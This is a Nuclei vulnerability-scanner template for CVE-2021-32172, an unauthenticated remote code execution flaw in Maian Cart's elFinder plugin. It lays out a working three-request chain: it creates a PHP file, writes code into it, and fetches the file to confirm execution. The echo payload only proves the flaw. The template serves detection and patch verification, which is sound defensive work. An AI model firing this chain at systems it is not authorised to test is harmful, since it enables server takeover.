nuclei-templates/cves/2021/CVE-2021-32172.yaml

57 lines
1.7 KiB
YAML

id: CVE-2021-32172
info:
name: Maian Cart 3.8 preauth RCE
author: pdteam
severity: critical
description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.
reference:
- https://dreyand.github.io/maian-cart-rce/
- https://github.com/DreyAnd/maian-cart-rce
- https://www.maianscriptworld.co.uk/critical-updates
- https://nvd.nist.gov/vuln/detail/CVE-2021-32172
tags: cve,cve2021,rce,unauth,maian
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-32172
cwe-id: CWE-862
requests:
- raw:
- |
GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
- |
GET /product-downloads/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
extractors:
- type: regex
name: hash
internal: true
group: 1
regex:
- '"hash"\:"(.*?)"\,'
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{randstr_1}}")'
- "status_code_3 == 200"
condition: and